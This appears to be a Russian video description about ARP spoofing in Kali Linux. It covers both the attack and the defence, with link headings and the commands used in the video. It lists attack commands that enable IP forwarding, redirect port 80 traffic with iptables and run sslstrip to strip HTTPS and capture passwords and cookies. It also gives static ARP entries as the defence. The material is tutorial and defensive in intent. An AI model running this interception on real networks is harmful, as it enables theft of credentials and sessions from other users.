ARP-спуфинг в Kali Linux. Взлом, защита и описание технологии
  • 6 years ago
Ссылки:\r
Обсудить компьютерную безопасность можно на моем новом форуме в этой ветке - \r
Взлом и защита wi-fi - \r
Загрузочная флешка на все случаи жизни - \r
Wireshark, взлом и защита в открытых wi-fi сетях - \r
Файлы куки, cookie, что это такое? Наглядно - \r
\r
Загрузка Kali linux - \r
Описание протокола ARP - \r
\r
HTTPS Everywhere - \r
\r
Команды используемые в видео:\r
---------------------------------------------------------------------------------------------\r
Включаем форвардинг ip-forwarding пакетов:\r
echo 1 (здесь знак меньше) /proc/sys/net/ipv4/ip_forward\r
\r
Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 8080 порт :\r
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080\r
\r
Запускаем SSLstrip на просушку заданного нами порта:\r
sslstrip -l 8080\r
---------------------------------------------------------------------------------------------\r
Создаем статический маршрут. Два варианта:\r
arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx\r
Если первый не сработал то вот второй вариант:\r
netsh interface ipv4 add neighbors Подключение по локальной сети 192.168.1.1 xx-x-xx-xx-xx-xx\r
\r
В этом видео я постарался подробно рассказать про так называемый ARP-спуфинг (arp-spoofing) и защиту от него. Это атака благодаря которой можно украсть пароль от сайта, перехватить cookie или сессии, скомпроментировать работу через защищенное подключение HTTPS и многое другое. В видео я использовал Kali Linux 1.0.6, ettercap-graphical, sslstrip, webspy и прочие инструменты. Вы также узнаете что такое ARP-протокол и MAC-адрес. Надеюсь что вам будет интересно!
Recommended